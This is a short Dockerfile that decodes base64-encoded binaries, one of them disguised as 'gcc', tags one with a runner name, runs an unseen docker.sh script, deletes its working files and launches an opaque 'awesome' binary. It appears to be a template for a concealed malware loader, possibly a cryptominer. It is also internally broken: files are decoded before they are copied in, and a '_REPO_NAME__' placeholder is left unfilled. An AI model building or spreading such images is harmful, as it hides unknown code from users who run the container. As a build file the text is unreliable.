FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > awesome.log'

RUN base64 --decode awesome.64 > awesome
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY awesome .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' awesome
RUN bash ./docker.sh

RUN rm --force --recursive awesome _REPO_NAME__.64 docker.sh gcc gcc.64

CMD awesome
